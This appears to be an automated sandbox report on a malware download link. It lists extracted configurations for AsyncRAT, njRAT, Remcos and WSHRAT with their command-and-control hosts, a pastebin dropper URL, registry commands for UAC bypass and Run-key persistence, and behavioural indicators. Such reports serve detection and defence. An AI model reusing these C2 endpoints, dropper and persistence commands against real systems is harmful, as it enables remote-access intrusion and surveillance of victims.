asyncrat | hxxps://docs[.]google[.]com/uc?export=download&id=1y2UoIwd7m-LShRwsg1LE4wpX7fgxo0UG

Analysis

max time kernel
266s
max time network
271s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29/10/2024, 16:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://docs.google.com/uc?export=download&id=1y2UoIwd7m-LShRwsg1LE4wpX7fgxo0UG

Score

10^/10

asyncrat njrat remcos wshrat nyan cat octubre22 remotehost defense_evasion discovery evasion execution persistence rat trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Language

ps1

Source

URLs

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Language

ps1

Source

URLs

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Language

ps1

Source

URLs

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Family

asyncrat

Version

1.0.7

Botnet

octubre22

manuelmorenomanuel1234.duckdns.org:2024

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

| CRACKED BY https://t.me/xworm_v2

Botnet

octubre22

manuelmorenomanuel123.duckdns.org:2025

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

carlitosmoreno1794.duckdns.org:2019

Mutex

bde06c84e1de4b23b

Attributes

reg_key
bde06c84e1de4b23b
splitter
@!#&^%$

Extracted

Family

remcos

Botnet

RemoteHost

carlitosmoreno1792.duckdns.org:2016

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
true
keylog_crypt
false
keylog_file
registros.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-ZOL3YD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Capturas de pantalla
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

wshrat

http://peinadorafael779.duckdns.org:2015

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Njrat family
njrat
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

WSHRAT
WSHRAT is a variant of Houdini worm and has vbs and js variants.
trojan wshrat

WSHRAT payload 1 IoCs

resource	yara_rule
behavioral1/files/0x0009000000023d4b-531.dat	family_wshrat

Wshrat family
wshrat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 33 IoCs

flow	pid	Process
60	1224	powershell.exe
63	2908	powershell.exe
65	2908	powershell.exe
68	1224	powershell.exe
69	1224	powershell.exe
71	1224	powershell.exe
73	1660	powershell.exe
76	5876	powershell.exe
81	5876	powershell.exe
84	1660	powershell.exe
86	1660	powershell.exe
89	1660	powershell.exe
120	2404	powershell.exe
122	936	powershell.exe
124	936	powershell.exe
125	2404	powershell.exe
127	2404	powershell.exe
131	2404	powershell.exe
133	5448	powershell.exe
136	5952	powershell.exe
138	5952	powershell.exe
139	5448	powershell.exe
141	5448	powershell.exe
143	5448	powershell.exe
144	3488	powershell.exe
146	224	powershell.exe
148	224	powershell.exe
149	3488	powershell.exe
150	3488	powershell.exe
152	3488	powershell.exe
157	4964	wscript.exe
160	4964	wscript.exe
161	4964	wscript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1664	powershell.exe
2316	powershell.exe
3436	powershell.exe
264	powershell.exe
6000	powershell.exe
5488	powershell.exe
6032	powershell.exe
2264	powershell.exe
1008	powershell.exe
1224	powershell.exe
1660	powershell.exe
2404	powershell.exe
5448	powershell.exe
3488	powershell.exe

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	mshta.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncocck.js	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncocck.js	wscript.exe

Executes dropped EXE 3 IoCs

pid	Process
368	remcos.exe
5876	IObitUnlocker.exe
1548	kl-plugin.exe

Loads dropped DLL 1 IoCs

pid	Process
5876	IObitUnlocker.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-ZOL3YD = "\"C:\\ProgramData\\Remcos\\remcos.exe\""	AddInProcess32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ncocck = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\ncocck.js\""	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ncocck = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\ncocck.js\""	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ncocck = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\ncocck.js\""	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ncocck = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\ncocck.js\""	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-ZOL3YD = "\"C:\\ProgramData\\Remcos\\remcos.exe\""	AddInProcess32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 18 IoCs

Web Service

T1102

flow	ioc
62	bitbucket.org
73	pastebin.com
76	bitbucket.org
121	bitbucket.org
63	bitbucket.org
139	bitbucket.org
144	pastebin.com
59	pastebin.com
60	pastebin.com
68	bitbucket.org
120	pastebin.com
125	bitbucket.org
133	pastebin.com
84	bitbucket.org
122	bitbucket.org
136	bitbucket.org
146	bitbucket.org
149	bitbucket.org

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
156	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1224 set thread context of 5040	1224	powershell.exe	143
PID 1660 set thread context of 2352	1660	powershell.exe	147
PID 2404 set thread context of 5580	2404	powershell.exe	177
PID 5448 set thread context of 5236	5448	powershell.exe	193
PID 3488 set thread context of 3956	3488	powershell.exe	203

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmstp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	remcos.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmstp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmstp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kl-plugin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5132	PING.EXE
3324	PING.EXE
4480	PING.EXE
4180	PING.EXE
5396	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
5648	taskkill.exe
5224	taskkill.exe
2628	taskkill.exe
1068	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	AddInProcess32.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4848	reg.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
5132	PING.EXE
3324	PING.EXE
4480	PING.EXE
4180	PING.EXE
5396	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	160	WSHRAT\|24025E54\|UTKBEBLO\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 29/10/2024\|JavaScript-v2.0\|GB:United Kingdom
HTTP User-Agent header	161	WSHRAT\|24025E54\|UTKBEBLO\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 29/10/2024\|JavaScript-v2.0\|GB:United Kingdom

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3612	msedge.exe
3612	msedge.exe
4168	msedge.exe
4168	msedge.exe
2380	identity_helper.exe
2380	identity_helper.exe
2356	msedge.exe
2356	msedge.exe
6000	powershell.exe
6000	powershell.exe
6000	powershell.exe
1224	powershell.exe
1224	powershell.exe
1224	powershell.exe
2908	powershell.exe
2908	powershell.exe
2908	powershell.exe
5488	powershell.exe
5488	powershell.exe
5488	powershell.exe
1660	powershell.exe
1660	powershell.exe
1660	powershell.exe
5876	powershell.exe
5876	powershell.exe
5876	powershell.exe
5768	msedge.exe
5768	msedge.exe
5768	msedge.exe
5768	msedge.exe
2316	powershell.exe
2316	powershell.exe
2316	powershell.exe
5040	AddInProcess32.exe
5040	AddInProcess32.exe
6032	powershell.exe
6032	powershell.exe
6032	powershell.exe
2404	powershell.exe
2404	powershell.exe
2404	powershell.exe
936	powershell.exe
936	powershell.exe
936	powershell.exe
3436	powershell.exe
3436	powershell.exe
3436	powershell.exe
5040	AddInProcess32.exe
2264	powershell.exe
2264	powershell.exe
2264	powershell.exe
5448	powershell.exe
5448	powershell.exe
5448	powershell.exe
5952	powershell.exe
5952	powershell.exe
5952	powershell.exe
264	powershell.exe
264	powershell.exe
264	powershell.exe
5040	AddInProcess32.exe
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5236	AddInProcess32.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
636	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeRestorePrivilege	5488	7zG.exe
Token: 35	5488	7zG.exe
Token: SeSecurityPrivilege	5488	7zG.exe
Token: SeSecurityPrivilege	5488	7zG.exe
Token: SeDebugPrivilege	6000	powershell.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	2908	powershell.exe
Token: SeDebugPrivilege	5488	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	5040	AddInProcess32.exe
Token: SeDebugPrivilege	5876	powershell.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	6032	powershell.exe
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	5448	powershell.exe
Token: SeDebugPrivilege	5952	powershell.exe
Token: SeDebugPrivilege	5580	AddInProcess32.exe
Token: SeDebugPrivilege	264	powershell.exe
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeDebugPrivilege	224	powershell.exe
Token: SeDebugPrivilege	5236	AddInProcess32.exe
Token: 33	5236	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	5236	AddInProcess32.exe
Token: SeDebugPrivilege	5648	taskkill.exe
Token: 33	5236	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	5236	AddInProcess32.exe
Token: SeDebugPrivilege	6104	powershell.exe
Token: SeDebugPrivilege	5224	taskkill.exe
Token: 33	5236	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	5236	AddInProcess32.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	5596	powershell.exe
Token: SeDebugPrivilege	2628	taskkill.exe
Token: 33	5236	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	5236	AddInProcess32.exe
Token: SeDebugPrivilege	5940	powershell.exe
Token: 33	5236	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	5236	AddInProcess32.exe
Token: 33	5236	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	5236	AddInProcess32.exe
Token: 33	5236	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	5236	AddInProcess32.exe
Token: SeDebugPrivilege	1068	taskkill.exe
Token: 33	5236	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	5236	AddInProcess32.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
5488	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
5876	IObitUnlocker.exe
5876	IObitUnlocker.exe
5876	IObitUnlocker.exe
5876	IObitUnlocker.exe
1548	kl-plugin.exe
1548	kl-plugin.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4168 wrote to memory of 3052	4168	msedge.exe	84
PID 4168 wrote to memory of 3052	4168	msedge.exe	84
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3772	4168	msedge.exe	85
PID 4168 wrote to memory of 3612	4168	msedge.exe	86
PID 4168 wrote to memory of 3612	4168	msedge.exe	86
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87
PID 4168 wrote to memory of 2152	4168	msedge.exe	87

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://docs.google.com/uc?export=download&id=1y2UoIwd7m-LShRwsg1LE4wpX7fgxo0UG
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ff8037e46f8,0x7ff8037e4708,0x7ff8037e4718
  2⤵
  PID:3052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
  2⤵
  PID:3772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
  2⤵
  PID:2152
